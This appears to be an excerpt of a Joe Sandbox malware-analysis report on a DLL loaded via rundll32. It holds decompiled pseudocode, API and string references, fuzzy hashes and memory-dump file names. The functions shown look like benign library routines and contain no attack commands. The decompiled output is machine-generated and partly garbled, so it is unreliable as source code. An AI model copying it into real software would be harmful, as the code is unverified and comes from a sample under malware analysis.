Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_mallocz$mv_calloc
String ID:
API String ID: 1417229449-0
Opcode ID: 11c5df3fdc17ecbdb580f76e82102d0b651416b72ae8ebbfb0f71fad63a734a3
Instruction ID: 5eac887c21a6c61861bed7af62f95aa57474651100df0996b3e61034f298f0f1
Opcode Fuzzy Hash: 11c5df3fdc17ecbdb580f76e82102d0b651416b72ae8ebbfb0f71fad63a734a3
Instruction Fuzzy Hash: 4151F574605B529BC750EF69D88061AF7E0FF48794F42892CE9958B309EB34F890CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 1002C428 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 134COMMON

Download Yara Rule

APIs

mv_opt_find2.MAIN ref: 1002C491
mv_expr_parse_and_eval.MAIN ref: 1002C5F5

Strings

all, xrefs: 1002C56F
max, xrefs: 1002C505
default, xrefs: 1002C4D2
none, xrefs: 1002C54A
min, xrefs: 1002C51F

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_expr_parse_and_evalmv_opt_find2
String ID: all$default$max$min$none
API String ID: 1085414910-3292705889
Opcode ID: 05f116ab4216a71b82e377bc1341495c5a2543e1ca9045ea53113bbb773d4fbb
Instruction ID: 18531c70e26c900463f27e75ba25a0c49568f7c26c871f4daec10b5f5a2a946d
Opcode Fuzzy Hash: 05f116ab4216a71b82e377bc1341495c5a2543e1ca9045ea53113bbb773d4fbb
Instruction Fuzzy Hash: FD512574A097458BC391EF68E04079BBBE5FFC9354F618A2EE8C8C7200EB71D8448B42

Uniqueness

Uniqueness Score: -1.00%

Function 10013480 Relevance: 9.3, APIs: 6, Instructions: 286
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E10013480() {
				int _t125;
				void* _t127;
				void* _t128;
				signed char* _t138;
				signed char _t141;
				signed int _t143;
				void* _t145;
				signed char _t148;
				signed int _t150;
				int _t153;
				int _t154;
				int _t161;
				void _t162;
				signed int _t163;
				void* _t164;
				void _t168;
				signed int _t171;
				int _t172;
				signed int _t175;
				int _t176;
				signed int* _t177;
				int* _t178;
				int _t179;
				int _t182;
				int _t185;
				signed int _t193;
				signed int _t194;
				int _t195;
				signed int _t196;
				int _t198;
				void* _t202;
				signed int _t205;
				int _t206;
				void* _t215;
				void* _t218;
				void* _t222;
				void* _t232;
				void* _t233;
				void* _t234;
				int _t236;
				void* _t239;
				void* _t240;
				signed char* _t246;
				signed int _t247;
				void _t248;
				int* _t249;
				int* _t250;

				_t177 = _t249[0x1c];
				_t125 = _t249[0x1d];
				if(_t177 == 0 || _t125 <= 3) {
					L36:
					_t249[0x12] = 0;
					goto L37;
				} else {
					_t194 =  *_t177;
					_t178 =  &(_t177[1]);
					_t249[0x11] = 0;
					_t127 = _t125 - 4;
					asm("bswap edx");
					_t249[0x10] = _t194;
					if(_t194 != 0 && _t127 > 0xf) {
						_t249[0xa] = 0;
						_t249[0xb] = 0;
						_t249[0x12] = 0;
						while(1) {
							_t195 =  *_t178;
							_t128 = _t127 - 0x10;
							_t249[8] = _t128;
							_t171 = _t178[2];
							_t249[0xc] = _t128;
							_t249[0xd] = 0;
							asm("bswap edx");
							_t249[5] = _t195;
							_t196 = _t178[1];
							asm("bswap ebx");
							asm("bswap edx");
							_t249[0xe] = _t196;
							_t249[6] = _t196;
							_t249[7] = 0;
							_t198 = _t178[3];
							asm("bswap edx");
							_t249[9] = _t198;
							asm("adc edi, edx");
							asm("adc edi, edx");
							asm("sbb eax, edi");
							if(_t249[8] < _t195 + _t198 + _t196 * _t171) {
								break;
							}
							_t249[2] = _t171;
							_t249[0xc] =  &(_t178[4]);
							_t249[3] = _t249[9];
							_t249[1] = _t249[0xe];
							 *_t249 = _t249[5];
							_t138 = E10013100(_t178);
							_t202 = _t249[0xc];
							_t246 = _t138;
							if(_t138 == 0) {
								break;
							}
							if((_t249[0xb] | _t249[0xa]) == 0) {
								_t249[0x12] = _t246;
							} else {
								 *(_t249[0xf] + 0x1c) = _t246;
							}
							_t179 = _t249[5];
							_t232 = _t202;
							_t141 =  *_t246;
							_t215 = _t141;
							if(_t179 >= 8) {
								if((_t141 & 0x00000001) != 0) {
									_t232 = _t202 + 1;
									_t215 = _t215 + 1;
									 *_t141 =  *_t202 & 0x000000ff;
									_t179 = _t249[5] - 1;
								}
								if((_t215 & 0x00000002) != 0) {
									_t143 =  *_t232 & 0x0000ffff;
									_t215 = _t215 + 2;
									_t232 = _t232 + 2;
									_t179 = _t179 - 2;
									 *(_t215 - 2) = _t143;
								}
								if((_t215 & 0x00000004) != 0) {
									_t168 =  *_t232;
									_t215 = _t215 + 4;
									_t232 = _t232 + 4;
									_t179 = _t179 - 4;
									 *(_t215 - 4) = _t168;
								}
							}
							memcpy(_t215, _t232, _t179);
							_t250 =  &(_t249[3]);
							_t145 = _t250[5];
							_t233 = _t202 + _t145;
							_t250[0xc] = _t233;
							_t250[0xf] = _t250[8] - _t145;
							if((_t250[0xe] | _t250[7]) == 0) {
								L19:
								_t172 = _t250[9];
								_t148 = _t246[0x14];
								_t234 = _t250[0xc];
								_t182 = _t172;
								_t218 = _t148;
								if(_t172 >= 8) {
									if((_t148 & 0x00000001) != 0) {
										_t205 =  *_t234 & 0x000000ff;
										_t234 = _t234 + 1;
										_t218 = _t218 + 1;
										_t250[5] = _t205;
										 *_t148 = _t205;
										_t182 = _t250[9] - 1;
									}
									if((_t218 & 0x00000002) != 0) {
										_t150 =  *_t234 & 0x0000ffff;
										_t218 = _t218 + 2;
										_t234 = _t234 + 2;
										_t182 = _t182 - 2;
										 *(_t218 - 2) = _t150;
									}
									if((_t218 & 0x00000004) != 0) {
										_t162 =  *_t234;
										_t218 = _t218 + 4;
										_t234 = _t234 + 4;
										_t182 = _t182 - 4;
										 *(_t218 - 4) = _t162;
									}
								}
								memcpy(_t218, _t234, _t182);
								_t249 =  &(_t250[3]);
								_t206 = _t249[9];
								_t178 = _t249[0xc] + _t206;
								_t127 = _t249[0xf] - _t206;
								_t249[0xa] = _t249[0xa] + 1;
								asm("adc dword [esp+0x2c], 0x0");
								if((_t249[0x11] ^ _t249[0xb] | _t249[0x10] ^ _t249[0xa]) == 0) {
									L37:
									return _t249[0x12];
								} else {
									if(_t127 <= 0xf) {
										_t153 = _t249[0x12];
										if(_t153 == 0) {
											goto L36;
										}
										_t175 = 0;
										_t236 = _t153;
										if( *((intOrPtr*)(_t153 + 0xc)) == 0) {
											L46:
											_t154 = _t249[0x12];
											_t155 =  *((intOrPtr*)(_t154 + 0x1c));
											if( *((intOrPtr*)(_t154 + 0x1c)) != 0) {
												E10012850(_t155);
											}
											_t176 = _t249[0x12];
											 *_t249 =  *_t176;
											L100265B0();
											 *_t249 =  *(_t176 + 8);
											L100265B0();
											 *_t249 =  *(_t176 + 0x14);
											L100265B0();
											 *_t249 = _t176;
											L100265B0();
											goto L36;
										}
										do {
											_t161 =  *( *((intOrPtr*)(_t236 + 8)) + _t175 * 4);
											_t175 = _t175 + 1;
											 *_t249 = _t161;
											L100265B0();
										} while (_t175 <  *((intOrPtr*)(_t236 + 0xc)));
										goto L46;
									}
									_t249[0xf] = _t246;
									continue;
								}
							} else {
								_t250[5] = _t233;
								_t163 = 0;
								_t250[8] = _t246;
								goto L13;
								L13:
								_t185 = _t171;
								_t222 =  *(_t250[8][8] + _t163 * 4);
								_t239 = _t250[5];
								if(_t171 >= 8) {
									if((_t222 & 0x00000001) != 0) {
										_t193 =  *_t239 & 0x000000ff;
										_t222 = _t222 + 1;
										_t239 = _t239 + 1;
										_t250[0x13] = _t193;
										 *(_t222 - 1) = _t193;
										_t185 = _t171 - 1;
									}
									if((_t222 & 0x00000002) != 0) {
										_t247 =  *_t239 & 0x0000ffff;
										_t222 = _t222 + 2;
										_t239 = _t239 + 2;
										_t185 = _t185 - 2;
										 *(_t222 - 2) = _t247;
									}
									if((_t222 & 0x00000004) != 0) {
										_t248 =  *_t239;
										_t222 = _t222 + 4;
										_t239 = _t239 + 4;
										_t185 = _t185 - 4;
										 *(_t222 - 4) = _t248;
									}
								}
								_t164 = memcpy(_t222, _t239, _t185);
								_t250 =  &(_t250[3]);
								_t240 = _t164;
								_t250[5] = _t250[5] + _t171;
								_t163 = _t164 + 1;
								asm("adc edx, 0x0");
								if((_t250[7] ^ 0 | _t250[6] ^ _t163) == 0) {
									_t246 = _t250[8];
									_t250[0xc] = _t250[0xc] + (_t240 + 1) * _t171;
									_t250[0xf] = _t250[0xf] - (_t250[0xe] - 1) * _t171 - _t171;
									goto L19;
								} else {
									goto L13;
								}
							}
						}
						_t133 = _t249[0x12];
						if(_t249[0x12] != 0) {
							E10012850(_t133);
						}
					}
					goto L36;
				}
			}

0x10013487
0x1001348b
0x10013491
0x10013781
0x10013783
0x00000000
0x100134a0
0x100134a0
0x100134a4
0x100134a7
0x100134ab
0x100134ae
0x100134b0
0x100134b6
0x100134c9
0x100134cf
0x100134d3
0x100134e0
0x100134e0
0x100134e2
0x100134e7
0x100134eb
0x100134ee
0x100134f2
0x100134f8
0x100134fa
0x10013500
0x10013503
0x10013505
0x10013507
0x1001350d
0x10013513
0x10013517
0x1001351a
0x1001351c
0x10013528
0x10013532
0x10013538
0x1001353a
0x00000000
0x00000000
0x10013540
0x1001354b
0x1001354f
0x10013557
0x1001355f
0x10013562
0x10013567
0x1001356d
0x1001356f
0x00000000
0x00000000
0x1001357f
0x10013738
0x10013585
0x10013589
0x10013589
0x1001358c
0x10013590
0x10013592
0x10013598
0x1001359a
0x100136ca
0x100137d9
0x100137dc
0x100137dd
0x100137e3
0x100137e3
0x100136d6
0x10013793
0x10013796
0x10013799
0x1001379c
0x1001379f
0x1001379f
0x100136e2
0x100136e8
0x100136ea
0x100136ed
0x100136f0
0x100136f3
0x100136f3
0x100136e2
0x100135a0
0x100135a0
0x100135a2
0x100135a6
0x100135ad
0x100135bb
0x100135bf
0x10013660
0x10013660
0x10013664
0x10013667
0x1001366e
0x10013670
0x10013672
0x10013702
0x100137bd
0x100137c0
0x100137c3
0x100137c4
0x100137c8
0x100137ce
0x100137ce
0x1001370e
0x100137a8
0x100137ab
0x100137ae
0x100137b1
0x100137b4
0x100137b4
0x1001371a
0x10013720
0x10013722
0x10013725
0x10013728
0x1001372b
0x1001372b
0x1001371a
0x10013678
0x10013678
0x1001367a
0x1001368a
0x1001368c
0x10013692
0x10013697
0x100136aa
0x10013787
0x10013792
0x100136b0
0x100136b3
0x100137eb
0x100137f1
0x00000000
0x00000000
0x100137f6
0x100137f8
0x100137fc
0x10013814
0x10013814
0x10013818
0x1001381d
0x1001381f
0x1001381f
0x10013824
0x1001382a
0x1001382d
0x10013835
0x10013838
0x10013840
0x10013843
0x10013848
0x1001384b
0x00000000
0x1001384b
0x10013800
0x10013803
0x10013806
0x10013807
0x1001380a
0x1001380f
0x00000000
0x10013800
0x100136b9
0x00000000
0x100136b9
0x100135c5
0x100135c5
0x100135c9
0x100135cd
0x100135d1
0x100135f6
0x100135fd
0x10013602
0x10013605
0x10013609
0x10013611
0x10013760
0x10013763
0x10013764
0x10013765
0x10013769
0x1001376c
0x1001376c
0x1001361d
0x10013748
0x1001374b
0x1001374e
0x10013751
0x10013754
0x10013754
0x10013629
0x1001362b
0x1001362d
0x10013630
0x10013633
0x10013636
0x10013636
0x10013629
0x100135d8
0x100135d8
0x100135da
0x100135e4
0x100135e8
0x100135eb
0x100135f4
0x1001364c
0x10013650
0x1001365c
0x00000000
0x00000000
0x00000000
0x00000000
0x100135f4
0x100135bf
0x10013774
0x1001377a
0x1001377c
0x1001377c
0x1001377a
0x00000000
0x100134b6

APIs

mv_encryption_init_info_alloc.MAIN ref: 10013562

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_encryption_init_info_alloc
String ID:
API String ID: 3189372936-0
Opcode ID: 40eb082df2a873b27e792bc7caffd1106743bd01b0e16bd1d615b7bb6c7bfb03
Instruction ID: a1e043498c3c16070c5ce0a7d842a7d55674a9d60fbffb8ceeaa7ba958246eb1
Opcode Fuzzy Hash: 40eb082df2a873b27e792bc7caffd1106743bd01b0e16bd1d615b7bb6c7bfb03
Instruction Fuzzy Hash: ACB169B1A083418FC764CF29C58461BFBE2FFC8254F56896DE9899B350E731E981CB52

Uniqueness

Uniqueness Score: -1.00%

Function 10028590 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 267stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 10028711

Strings

%d.%06d, xrefs: 100288F3
INT64_MAX, xrefs: 10028886
INT64_MIN, xrefs: 100288C6
%lld:%02d:%02d.%06d, xrefs: 10028866
%d:%02d.%06d, xrefs: 10028700

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: strlen
String ID: %d.%06d$%d:%02d.%06d$%lld:%02d:%02d.%06d$INT64_MAX$INT64_MIN
API String ID: 39653677-2240581584
Opcode ID: 5ea261cdb59da726b0206cc8ad8b11822e12deeae5e592c96d0b6b2e14b3df2d
Instruction ID: c54e951a0f1896a6386a6c5c1f669f1c3c64ce07789a61242c38440661c84367
Opcode Fuzzy Hash: 5ea261cdb59da726b0206cc8ad8b11822e12deeae5e592c96d0b6b2e14b3df2d
Instruction Fuzzy Hash: A8A16D76A193118FC308CF6DC44421EFBE6EBC8350F998A2EF488D7364DA74D9058B82

Uniqueness

Uniqueness Score: -1.00%

Function 10007270 Relevance: 6.3, APIs: 4, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 355135263088e94a10b3081d7ca45438585c75b071c068879c5feec0f380323f
Instruction ID: 51e70f272ae0093965207845ec1cb951f05259167ff59344558e7544d7b47f58
Opcode Fuzzy Hash: 355135263088e94a10b3081d7ca45438585c75b071c068879c5feec0f380323f
Instruction Fuzzy Hash: 69C19E71A087858BD350CF2D888064EBBE1FFC9294F198A2EF9D8C7355E675D9448B42

Uniqueness

Uniqueness Score: -1.00%

Function 1009E390 Relevance: 6.1, APIs: 4, Instructions: 120timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 1009E3C6
GetSystemTimeAsFileTime.KERNEL32 ref: 1009E468
_errno.MSVCRT ref: 1009E4E6
_errno.MSVCRT ref: 1009E516

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Time$FileSystem_errno
String ID:
API String ID: 3586254970-0
Opcode ID: eb795a304289e64b422f20939e939fd83203c3a050f27a67b90a55001f882086
Instruction ID: a6a4ef0f4dcf97e1d99c5454615c768c8d757491a9aa12e503df49880ea70f1b
Opcode Fuzzy Hash: eb795a304289e64b422f20939e939fd83203c3a050f27a67b90a55001f882086
Instruction Fuzzy Hash: BC4189716087548FC754DF79C98461ABBE5FBC8750F118A2EEAA887350E770ED448B82

Uniqueness

Uniqueness Score: -1.00%

Function 1008F660 Relevance: 4.6, APIs: 3, Instructions: 62timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32 ref: 1008F681

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: 911fbccf3e6d103ec169fe48f33fd043b6d4840403c0ea04d5ce06a0aebe5803
Instruction ID: 644768b22c3724b228d8b808f31f7f684975bc292c311e4257fcfe74704407b1
Opcode Fuzzy Hash: 911fbccf3e6d103ec169fe48f33fd043b6d4840403c0ea04d5ce06a0aebe5803
Instruction Fuzzy Hash: D32125B08093119FDB10EF34D5C936ABBE0FF88354F018A2DE88587254E778D884CB52

Uniqueness

Uniqueness Score: -1.00%

Function 1004B2A5 Relevance: 4.0, Strings: 3, Instructions: 241
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E1004B2A5(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				unsigned int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _t122;
				signed int _t123;
				signed int _t142;
				signed int _t208;
				signed int _t216;
				signed int _t221;
				signed int _t222;
				signed int _t234;
				signed int _t243;
				signed int _t247;
				signed int _t298;
				signed int _t307;
				signed int _t308;
				intOrPtr* _t313;
				signed int _t325;
				signed int _t326;
				void* _t328;
				signed int* _t329;

				_t329 = _t328 - 0x2c;
				_t313 = _a4;
				_t216 =  *(_t313 + 0x10);
				_t234 =  *_t313 + _a8;
				_t122 =  *(_t313 + 4) & 0x00000001;
				_v44 = _t122;
				if(_t122 != 0 && _t216 != 0) {
					asm("ror eax, 1");
					if(0x8888888 + _t216 * 0xeeeeeeef <= 0x8888888) {
						_t307 = ((0x88888889 * _t216 >> 0x20) + _t216 >> 4) - (_t216 >> 0x1f);
						_t208 = _t234;
						_t326 = _t307 + _t307;
						asm("cdq");
						_t308 = _t307 * 0x463e;
						 *_t329 = _t208 / _t308;
						_v56 = _t208 % _t308 - _t326;
						asm("cdq");
						_t234 = _v56 / ((0x66666667 * _t308 >> 0x20 >> 2) - (_t308 >> 0x1f)) * _t326 + _t326 *  *_t329 + _t326 *  *_t329 * 8 + _t234;
					}
				}
				_t123 = _t234;
				_t124 = _t123 / _t216;
				_t247 = _t123 % _t216;
				_v40 = _t247;
				_v52 = _t247;
				 *_t329 = _t123 / _t216 - ((_t124 * 0x88888889 >> 0x20 >> 5 << 4) - (_t124 * 0x88888889 >> 0x20 >> 5) << 2);
				_t131 = _t234 / ((_t216 << 4) - _t216 << 2);
				_t138 = _t234 / _t216 * 0xe10;
				_t325 = _t234 / ((_t216 << 4) - _t216 << 2) - ((_t131 * 0x88888889 >> 0x20 >> 5 << 4) - (_t131 * 0x88888889 >> 0x20 >> 5) << 2);
				_t221 =  *(_t313 + 0xc);
				_t142 =  *(_t313 + 8);
				_v56 = _t234 / _t216 * 0xe10 - ((_t138 * 0xaaaaaaab >> 0x20 >> 4) + (_t138 * 0xaaaaaaab >> 0x20 >> 4) * 2 << 3);
				_v28 = _t221;
				_v36 = _t221;
				_v24 = _t142;
				_v32 = _t221 >> 0x1f;
				_t298 = _t142 >> 0x1f;
				_t222 = _t298;
				asm("sbb ebx, edx");
				_v48 = 0;
				if((_t222 | _t142 - 0x0000001e * _t221) != 0) {
					if((_v32 ^ _t222) < 0) {
						goto L5;
					}
					if((_v40 + (_v40 >> 0x0000001f) & 0x00000001) - (_v40 >> 0x1f) == 1) {
						if((0x00000032 * _v28 ^ _v24 | _t298 ^ 0x00000032 * _v28 >> 0x00000020) != 0) {
							_v48 = 0x800000;
						} else {
							if(_v28 != 0) {
								_v48 = 0x80;
							} else {
								_t201 =  <=  ? 0x800000 : 0x80;
								_v48 =  <=  ? 0x800000 : 0x80;
							}
						}
					}
					_v52 = (_v40 >> 0x1f) + _v40 >> 1;
				}
				L5:
				_t243 = _v52 - ((0x66666667 * _v52 >> 0x20 >> 4) - (_t316 >> 0x1f) + ((0x66666667 * _v52 >> 0x20 >> 4) - (_t316 >> 0x1f)) * 4 << 3);
				_v52 = _v44 << 0x1e;
				_t300 = _v56 * 0xcccccccd >> 0x20 >> 3;
				_t262 =  *_t329 * 0xcccccccd >> 0x20 >> 3;
				_t319 = _t325 * 0xcccccccd >> 0x20 >> 3;
				return _t243 - (0x66666667 * _t243 >> 0x00000020 >> 0x00000002) - (_t243 >> 0x0000001f) + ((0x66666667 * _t243 >> 0x00000020 >> 0x00000002) - (_t243 >> 0x0000001f)) * 0x00000004 + (0x66666667 * _t243 >> 0x00000020 >> 0x00000002) - (_t243 >> 0x0000001f) + ((0x66666667 * _t243 >> 0x00000020 >> 0x00000002) - (_t243 >> 0x0000001f)) * 0x00000004 << 0x00000018 | _v56 * 0xcccccccd >> 0x00000020 >> 0x00000003 << 0x00000004 |  *_t329 - ( *_t329 * 0xcccccccd >> 0x00000020 >> 0x00000003) + ( *_t329 * 0xcccccccd >> 0x00000020 >> 0x00000003) * 0x00000004 + ( *_t329 * 0xcccccccd >> 0x00000020 >> 0x00000003) + ( *_t329 * 0xcccccccd >> 0x00000020 >> 0x00000003) * 0x00000004 << 0x00000010 | _t262 << 0x00000014 | _v56 - (_v56 * 0xcccccccd >> 0x00000020 >> 0x00000003) + _t300 * 0x00000004 + (_v56 * 0xcccccccd >> 0x00000020 >> 0x00000003) + _t300 * 0x00000004 | _v52 | _t325 * 0xcccccccd >> 0x00000020 >> 0x00000003 << 0x0000000c | _t325 - (_t325 * 0xcccccccd >> 0x00000020 >> 0x00000003) + _t319 * 0x00000004 + (_t325 * 0xcccccccd >> 0x00000020 >> 0x00000003) + _t319 * 0x00000004 << 0x00000008 | _v48 | (0x66666667 * _t243 >> 0x00000020 >> 0x00000002) - (_t243 >> 0x0000001f) << 0x0000001c;
			}

0x1004b2b4
0x1004b2b7
0x1004b2c4
0x1004b2c7
0x1004b2c9
0x1004b2cc
0x1004b2d0
0x1004b2e1
0x1004b2e8
0x1004b2fc
0x1004b2fe
0x1004b300
0x1004b303
0x1004b304
0x1004b30c
0x1004b316
0x1004b32c
0x1004b33e
0x1004b33e
0x1004b2e8
0x1004b341
0x1004b345
0x1004b345
0x1004b34c
0x1004b352
0x1004b36b
0x1004b378
0x1004b399
0x1004b3a0
0x1004b3ae
0x1004b3b6
0x1004b3b9
0x1004b3bd
0x1004b3c1
0x1004b3c5
0x1004b3d4
0x1004b3d8
0x1004b3e2
0x1004b3e6
0x1004b3ea
0x1004b3f2
0x1004b4c6
0x00000000
0x00000000
0x1004b4dd
0x1004b513
0x1004b54d
0x1004b515
0x1004b51b
0x1004b53d
0x1004b51d
0x1004b529
0x1004b52c
0x1004b52c
0x1004b51b
0x1004b513
0x1004b4ec
0x1004b4ec
0x1004b3f8
0x1004b420
0x1004b429
0x1004b435
0x1004b44d
0x1004b46c
0x1004b4b9

Strings

gfff, xrefs: 1004B311
gfff, xrefs: 1004B3FC
gfff, xrefs: 1004B48C

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: gfff$gfff$gfff
API String ID: 0-4275324669
Opcode ID: 268b3e8c4049cf9f0418b796dedf1257a26545202377507e9ea087931b81b73a
Instruction ID: d59a2d3ae2d3648ea39482ecc8a01c73a7ed0aed4c874a4a860ecf1c914a34e2
Opcode Fuzzy Hash: 268b3e8c4049cf9f0418b796dedf1257a26545202377507e9ea087931b81b73a
Instruction Fuzzy Hash: EE71A632B047164BD758CE2ECD8020ABBD7EBC8350F598A3DE599DB394DA70ED158B81

Uniqueness

Uniqueness Score: -1.00%

Function 10013860 Relevance: 3.2, APIs: 2, Instructions: 222COMMON

Download Yara Rule

APIs

mv_malloc.MAIN ref: 10013AE8

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
